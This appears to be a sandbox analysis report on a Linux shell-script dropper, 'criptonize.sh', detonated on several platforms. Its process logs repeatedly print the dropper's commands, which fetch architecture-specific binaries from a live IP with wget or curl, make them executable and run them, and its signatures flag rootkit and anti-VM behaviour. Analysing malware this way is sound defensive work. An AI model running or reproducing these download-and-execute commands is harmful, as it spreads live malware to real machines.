[rm -f criptonize.x86_64]

/bin/rm

[rm -f criptonize.i686]

/usr/bin/wget

[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]

/bin/chmod

[chmod 777 criptonize.i686]

/tmp/criptonize.i686

[./criptonize.i686 i686]

/bin/rm

[rm -f criptonize.i686]

/bin/rm

[rm -f criptonize.i586]

/usr/bin/wget

[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]

/bin/chmod

[chmod 777 criptonize.i586]

/tmp/criptonize.i586

[./criptonize.i586 i586]

/bin/rm

[rm -f criptonize.i586]

/bin/rm

[rm -f criptonize.i486]

/usr/bin/wget

[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]

/bin/chmod

[chmod 777 criptonize.i486]

/tmp/criptonize.i486

[./criptonize.i486 i486]

/bin/rm

[rm -f criptonize.i486]

/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/wget

[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]

/bin/chmod

[chmod 777 criptonize.aarch64]

/tmp/criptonize.aarch64

[./criptonize.aarch64 aarch64]

/bin/rm

[rm -f criptonize.aarch64]

/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/wget

[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]

/bin/chmod

[chmod 777 criptonize.armv7l]

/tmp/criptonize.armv7l

[./criptonize.armv7l armv7l]

/bin/rm

[rm -f criptonize.armv7l]

/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/wget

[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]

/bin/chmod

[chmod 777 criptonize.armv6l]

/tmp/criptonize.armv6l

[./criptonize.armv6l armv6l]

/bin/rm

[rm -f criptonize.armv6l]

/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/wget

[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]

/bin/chmod

[chmod 777 criptonize.armv5l]

/tmp/criptonize.armv5l

[./criptonize.armv5l armv5l]

/bin/rm

[rm -f criptonize.armv5l]

/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/wget

[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]

/bin/chmod

[chmod 777 criptonize.armv4eb]

/tmp/criptonize.armv4eb

[./criptonize.armv4eb armv4eb]

/bin/rm

[rm -f criptonize.armv4eb]

/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/wget

[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]

/bin/chmod

[chmod 777 criptonize.armv4tl]

/tmp/criptonize.armv4tl

[./criptonize.armv4tl armv4tl]

/bin/rm

[rm -f criptonize.armv4tl]

/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/wget

[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]

/bin/chmod

[chmod 777 criptonize.armv4l]

/tmp/criptonize.armv4l

[./criptonize.armv4l armv4l]

/bin/rm

[rm -f criptonize.armv4l]

/bin/rm

[rm -f criptonize.mips64]

/usr/bin/wget

[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]

/bin/chmod

[chmod 777 criptonize.mips64]

/tmp/criptonize.mips64

[./criptonize.mips64 mips64]

/bin/rm

[rm -f criptonize.mips64]

/bin/rm

[rm -f criptonize.mips]

/usr/bin/wget

[wget -O criptonize.mips http://212.60.5.174/criptonize.mips]

/bin/chmod

[chmod 777 criptonize.mips]

/tmp/criptonize.mips

[./criptonize.mips mips]

/bin/rm

[rm -f criptonize.mips]

/bin/rm

[rm -f criptonize.mipsel]

/usr/bin/wget

[wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel]

Network

Country Destination Domain Proto
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 tcp

Files

memory/712-1-0xb672a000-0xb673b044-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-27 23:47

Reported

2024-08-27 23:47

Platform

debian9-mipsbe-20240611-en

Max time kernel

30s

Max time network

33s

Command Line

[/tmp/criptonize.sh]

Signatures

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/criptonize.aarch64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv7l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i686 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i586 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i486 /usr/bin/wget N/A

Processes

/tmp/criptonize.sh

[/tmp/criptonize.sh]

/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/wget

[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]

/bin/chmod

[chmod 777 criptonize.x86_64]

/tmp/criptonize.x86_64

[./criptonize.x86_64 x86_64]

/bin/rm

[rm -f criptonize.x86_64]

/bin/rm

[rm -f criptonize.i686]

/usr/bin/wget

[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]

/bin/chmod

[chmod 777 criptonize.i686]

/tmp/criptonize.i686

[./criptonize.i686 i686]

/bin/rm

[rm -f criptonize.i686]

/bin/rm

[rm -f criptonize.i586]

/usr/bin/wget

[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]

/bin/chmod

[chmod 777 criptonize.i586]

/tmp/criptonize.i586

[./criptonize.i586 i586]

/bin/rm

[rm -f criptonize.i586]

/bin/rm

[rm -f criptonize.i486]

/usr/bin/wget

[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]

/bin/chmod

[chmod 777 criptonize.i486]

/tmp/criptonize.i486

[./criptonize.i486 i486]

/bin/rm

[rm -f criptonize.i486]

/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/wget

[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]

/bin/chmod

[chmod 777 criptonize.aarch64]

/tmp/criptonize.aarch64

[./criptonize.aarch64 aarch64]

/bin/rm

[rm -f criptonize.aarch64]

/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/wget

[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]

/bin/chmod

[chmod 777 criptonize.armv7l]

/tmp/criptonize.armv7l

[./criptonize.armv7l armv7l]

/bin/rm

[rm -f criptonize.armv7l]

/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/wget

[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]

Network

Country Destination Domain Proto
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-08-27 23:47

Reported

2024-08-27 23:47

Platform

ubuntu2404-amd64-20240523-en

Max time kernel

28s

Max time network

33s

Command Line

[/tmp/criptonize.sh]

Signatures

Writes memory of remote process

Description Indicator Process Target
N/A N/A /tmp/criptonize.i686 N/A
N/A N/A /tmp/criptonize.i586 N/A

Loads a kernel module

rootkit
Description Indicator Process Target
N/A N/A /tmp/criptonize.i686 N/A
N/A N/A /tmp/criptonize.i586 N/A
N/A N/A /tmp/criptonize.i486 N/A
N/A N/A /tmp/criptonize.i486 N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/criptonize.mips /usr/bin/wget N/A
File opened for modification /tmp/criptonize.m68k /usr/bin/wget N/A
File opened for modification /tmp/criptonize.sh4 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.arc700 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv7l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv6l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv5l /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mipsel /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i686 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i586 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.aarch64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.bsdamd64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.x86_64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4tl /usr/bin/wget N/A
File opened for modification /tmp/criptonize.sparc /usr/bin/wget N/A
File opened for modification /tmp/criptonize.mips64 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.powerpc /usr/bin/wget N/A
File opened for modification /tmp/criptonize.i486 /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4eb /usr/bin/wget N/A
File opened for modification /tmp/criptonize.armv4l /usr/bin/wget N/A

Processes

/tmp/criptonize.sh

[/tmp/criptonize.sh]

/usr/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/wget

[wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]

/usr/bin/chmod

[chmod 777 criptonize.x86_64]

/tmp/criptonize.x86_64

[./criptonize.x86_64 x86_64]

/usr/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/rm

[rm -f criptonize.i686]

/usr/bin/wget

[wget -O criptonize.i686 http://212.60.5.174/criptonize.i686]

/usr/bin/chmod

[chmod 777 criptonize.i686]

/tmp/criptonize.i686

[./criptonize.i686 i686]

/usr/bin/rm

[rm -f criptonize.i686]

/usr/bin/rm

[rm -f criptonize.i586]

/usr/bin/wget

[wget -O criptonize.i586 http://212.60.5.174/criptonize.i586]

/usr/bin/chmod

[chmod 777 criptonize.i586]

/tmp/criptonize.i586

[./criptonize.i586 i586]

/usr/bin/rm

[rm -f criptonize.i586]

/usr/bin/rm

[rm -f criptonize.i486]

/usr/bin/wget

[wget -O criptonize.i486 http://212.60.5.174/criptonize.i486]

/usr/bin/chmod

[chmod 777 criptonize.i486]

/tmp/criptonize.i486

[./criptonize.i486 i486]

/usr/bin/rm

[rm -f criptonize.i486]

/usr/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/wget

[wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]

/usr/bin/chmod

[chmod 777 criptonize.aarch64]

/tmp/criptonize.aarch64

[./criptonize.aarch64 aarch64]

/usr/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/wget

[wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l]

/usr/bin/chmod

[chmod 777 criptonize.armv7l]

/tmp/criptonize.armv7l

[./criptonize.armv7l armv7l]

/usr/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/wget

[wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l]

/usr/bin/chmod

[chmod 777 criptonize.armv6l]

/tmp/criptonize.armv6l

[./criptonize.armv6l armv6l]

/usr/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/wget

[wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l]

/usr/bin/chmod

[chmod 777 criptonize.armv5l]

/tmp/criptonize.armv5l

[./criptonize.armv5l armv5l]

/usr/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/wget

[wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]

/usr/bin/chmod

[chmod 777 criptonize.armv4eb]

/tmp/criptonize.armv4eb

[./criptonize.armv4eb armv4eb]

/usr/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/wget

[wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]

/usr/bin/chmod

[chmod 777 criptonize.armv4tl]

/tmp/criptonize.armv4tl

[./criptonize.armv4tl armv4tl]

/usr/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/wget

[wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l]

/usr/bin/chmod

[chmod 777 criptonize.armv4l]

/tmp/criptonize.armv4l

[./criptonize.armv4l armv4l]

/usr/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/rm

[rm -f criptonize.mips64]

/usr/bin/wget

[wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64]

/usr/bin/chmod

[chmod 777 criptonize.mips64]

/tmp/criptonize.mips64

[./criptonize.mips64 mips64]

/usr/bin/rm

[rm -f criptonize.mips64]

/usr/bin/rm

[rm -f criptonize.mips]

/usr/bin/wget

[wget -O criptonize.mips http://212.60.5.174/criptonize.mips]

/usr/bin/chmod

[chmod 777 criptonize.mips]

/tmp/criptonize.mips

[./criptonize.mips mips]

/usr/bin/rm

[rm -f criptonize.mips]

/usr/bin/rm

[rm -f criptonize.mipsel]

/usr/bin/wget

[wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel]

/usr/bin/chmod

[chmod 777 criptonize.mipsel]

/tmp/criptonize.mipsel

[./criptonize.mipsel mipsel]

/usr/bin/rm

[rm -f criptonize.mipsel]

/usr/bin/rm

[rm -f criptonize.powerpc]

/usr/bin/wget

[wget -O criptonize.powerpc http://212.60.5.174/criptonize.powerpc]

/usr/bin/chmod

[chmod 777 criptonize.powerpc]

/tmp/criptonize.powerpc

[./criptonize.powerpc powerpc]

/usr/bin/rm

[rm -f criptonize.powerpc]

/usr/bin/rm

[rm -f criptonize.m68k]

/usr/bin/wget

[wget -O criptonize.m68k http://212.60.5.174/criptonize.m68k]

/usr/bin/chmod

[chmod 777 criptonize.m68k]

/tmp/criptonize.m68k

[./criptonize.m68k m68k]

/usr/bin/rm

[rm -f criptonize.m68k]

/usr/bin/rm

[rm -f criptonize.sh4]

/usr/bin/wget

[wget -O criptonize.sh4 http://212.60.5.174/criptonize.sh4]

/usr/bin/chmod

[chmod 777 criptonize.sh4]

/tmp/criptonize.sh4

[./criptonize.sh4 sh4]

/usr/bin/rm

[rm -f criptonize.sh4]

/usr/bin/rm

[rm -f criptonize.sparc]

/usr/bin/wget

[wget -O criptonize.sparc http://212.60.5.174/criptonize.sparc]

/usr/bin/chmod

[chmod 777 criptonize.sparc]

/tmp/criptonize.sparc

[./criptonize.sparc sparc]

/usr/bin/rm

[rm -f criptonize.sparc]

/usr/bin/rm

[rm -f criptonize.arc700]

/usr/bin/wget

[wget -O criptonize.arc700 http://212.60.5.174/criptonize.arc700]

/usr/bin/chmod

[chmod 777 criptonize.arc700]

/tmp/criptonize.arc700

[./criptonize.arc700 arc700]

/usr/bin/rm

[rm -f criptonize.arc700]

/usr/bin/rm

[rm -f criptonize.bsdamd64]

/usr/bin/wget

[wget -O criptonize.bsdamd64 http://212.60.5.174/criptonize.bsdamd64]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-27 23:47

Reported

2024-08-27 23:47

Platform

debian12-armhf-20240729-en

Max time kernel

29s

Max time network

31s

Command Line

[/tmp/criptonize.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/criptonize.mipsel /usr/bin/curl N/A
File opened for modification /tmp/criptonize.x86_64 /usr/bin/curl N/A
File opened for modification /tmp/criptonize.armv7l /usr/bin/curl N/A
File opened for modification /tmp/criptonize.armv5l /usr/bin/curl N/A
File opened for modification /tmp/criptonize.armv4l /usr/bin/curl N/A
File opened for modification /tmp/criptonize.mips64 /usr/bin/curl N/A
File opened for modification /tmp/criptonize.i586 /usr/bin/curl N/A
File opened for modification /tmp/criptonize.i686 /usr/bin/curl N/A
File opened for modification /tmp/criptonize.armv6l /usr/bin/curl N/A
File opened for modification /tmp/criptonize.armv4tl /usr/bin/curl N/A
File opened for modification /tmp/criptonize.mips /usr/bin/curl N/A
File opened for modification /tmp/criptonize.sh4 /usr/bin/curl N/A
File opened for modification /tmp/criptonize.i486 /usr/bin/curl N/A
File opened for modification /tmp/criptonize.aarch64 /usr/bin/curl N/A
File opened for modification /tmp/criptonize.armv4eb /usr/bin/curl N/A
File opened for modification /tmp/criptonize.powerpc /usr/bin/curl N/A
File opened for modification /tmp/criptonize.m68k /usr/bin/curl N/A

Processes

/tmp/criptonize.sh

[/tmp/criptonize.sh]

/usr/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/curl

[curl -o criptonize.x86_64 http://212.60.5.174/criptonize.x86_64]

/usr/bin/chmod

[chmod 777 criptonize.x86_64]

/tmp/criptonize.x86_64

[./criptonize.x86_64 x86_64]

/usr/bin/rm

[rm -f criptonize.x86_64]

/usr/bin/rm

[rm -f criptonize.i686]

/usr/bin/curl

[curl -o criptonize.i686 http://212.60.5.174/criptonize.i686]

/usr/bin/chmod

[chmod 777 criptonize.i686]

/tmp/criptonize.i686

[./criptonize.i686 i686]

/usr/bin/rm

[rm -f criptonize.i686]

/usr/bin/rm

[rm -f criptonize.i586]

/usr/bin/curl

[curl -o criptonize.i586 http://212.60.5.174/criptonize.i586]

/usr/bin/chmod

[chmod 777 criptonize.i586]

/tmp/criptonize.i586

[./criptonize.i586 i586]

/usr/bin/rm

[rm -f criptonize.i586]

/usr/bin/rm

[rm -f criptonize.i486]

/usr/bin/curl

[curl -o criptonize.i486 http://212.60.5.174/criptonize.i486]

/usr/bin/chmod

[chmod 777 criptonize.i486]

/tmp/criptonize.i486

[./criptonize.i486 i486]

/usr/bin/rm

[rm -f criptonize.i486]

/usr/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/curl

[curl -o criptonize.aarch64 http://212.60.5.174/criptonize.aarch64]

/usr/bin/chmod

[chmod 777 criptonize.aarch64]

/tmp/criptonize.aarch64

[./criptonize.aarch64 aarch64]

/usr/bin/rm

[rm -f criptonize.aarch64]

/usr/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/curl

[curl -o criptonize.armv7l http://212.60.5.174/criptonize.armv7l]

/usr/bin/chmod

[chmod 777 criptonize.armv7l]

/tmp/criptonize.armv7l

[./criptonize.armv7l armv7l]

/usr/bin/rm

[rm -f criptonize.armv7l]

/usr/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/curl

[curl -o criptonize.armv6l http://212.60.5.174/criptonize.armv6l]

/usr/bin/chmod

[chmod 777 criptonize.armv6l]

/tmp/criptonize.armv6l

[./criptonize.armv6l armv6l]

/usr/bin/rm

[rm -f criptonize.armv6l]

/usr/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/curl

[curl -o criptonize.armv5l http://212.60.5.174/criptonize.armv5l]

/usr/bin/chmod

[chmod 777 criptonize.armv5l]

/tmp/criptonize.armv5l

[./criptonize.armv5l armv5l]

/usr/bin/rm

[rm -f criptonize.armv5l]

/usr/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/curl

[curl -o criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb]

/usr/bin/chmod

[chmod 777 criptonize.armv4eb]

/tmp/criptonize.armv4eb

[./criptonize.armv4eb armv4eb]

/usr/bin/rm

[rm -f criptonize.armv4eb]

/usr/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/curl

[curl -o criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl]

/usr/bin/chmod

[chmod 777 criptonize.armv4tl]

/tmp/criptonize.armv4tl

[./criptonize.armv4tl armv4tl]

/usr/bin/rm

[rm -f criptonize.armv4tl]

/usr/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/curl

[curl -o criptonize.armv4l http://212.60.5.174/criptonize.armv4l]

/usr/bin/chmod

[chmod 777 criptonize.armv4l]

/tmp/criptonize.armv4l

[./criptonize.armv4l armv4l]

/usr/bin/rm

[rm -f criptonize.armv4l]

/usr/bin/rm

[rm -f criptonize.mips64]

/usr/bin/curl

[curl -o criptonize.mips64 http://212.60.5.174/criptonize.mips64]

/usr/bin/chmod

[chmod 777 criptonize.mips64]

/tmp/criptonize.mips64

[./criptonize.mips64 mips64]

/usr/bin/rm

[rm -f criptonize.mips64]

/usr/bin/rm

[rm -f criptonize.mips]

/usr/bin/curl

[curl -o criptonize.mips http://212.60.5.174/criptonize.mips]

/usr/bin/chmod

[chmod 777 criptonize.mips]

/tmp/criptonize.mips

[./criptonize.mips mips]

/usr/bin/rm

[rm -f criptonize.mips]

/usr/bin/rm

[rm -f criptonize.mipsel]

/usr/bin/curl

[curl -o criptonize.mipsel http://212.60.5.174/criptonize.mipsel]

/usr/bin/chmod

[chmod 777 criptonize.mipsel]

/tmp/criptonize.mipsel

[./criptonize.mipsel mipsel]

/usr/bin/rm

[rm -f criptonize.mipsel]

/usr/bin/rm

[rm -f criptonize.powerpc]

/usr/bin/curl

[curl -o criptonize.powerpc http://212.60.5.174/criptonize.powerpc]

/usr/bin/chmod

[chmod 777 criptonize.powerpc]

/tmp/criptonize.powerpc

[./criptonize.powerpc powerpc]

/usr/bin/rm

[rm -f criptonize.powerpc]

/usr/bin/rm

[rm -f criptonize.m68k]

/usr/bin/curl

[curl -o criptonize.m68k http://212.60.5.174/criptonize.m68k]

/usr/bin/chmod

[chmod 777 criptonize.m68k]

/tmp/criptonize.m68k

[./criptonize.m68k m68k]

/usr/bin/rm

[rm -f criptonize.m68k]

/usr/bin/rm

[rm -f criptonize.sh4]

/usr/bin/curl

[curl -o criptonize.sh4 http://212.60.5.174/criptonize.sh4]

/usr/bin/chmod

[chmod 777 criptonize.sh4]

/tmp/criptonize.sh4

[./criptonize.sh4 sh4]

/usr/bin/rm

[rm -f criptonize.sh4]

/usr/bin/rm

[rm -f criptonize.sparc]

/usr/bin/curl

[curl -o criptonize.sparc http://212.60.5.174/criptonize.sparc]

Network

Country Destination Domain Proto
RU 212.60.5.174:80 212.60.5.174 tcp
US 1.1.1.1:53 debian12-armhf-20240729-en-10 udp
US 1.1.1.1:53 debian12-armhf-20240729-en-10 udp
RU 212.60.5.174:80 212.60.5.174 tcp
US 1.1.1.1:53 debian12-armhf-20240729-en-10 udp
US 1.1.1.1:53 debian12-armhf-20240729-en-10 udp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp
RU 212.60.5.174:80 212.60.5.174 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-27 23:47

Reported

2024-08-27 23:57

Platform

debian12-mipsel-20240418-en

Max time kernel

0s

Max time network

13s

Command Line

[/tmp/criptonize.sh]

Signatures

N/A

Processes

/tmp/criptonize.sh

[/tmp/criptonize.sh]

Network

Country Destination Domain Proto
US 1.1.1.1:53 debian12-mipsel-20240418-en-14 udp
US 1.1.1.1:53 debian12-mipsel-20240418-en-14 udp
US 1.1.1.1:53 debian12-mipsel-20240418-en-14 udp
US 1.1.1.1:53 debian12-mipsel-20240418-en-14 udp

Files

N/A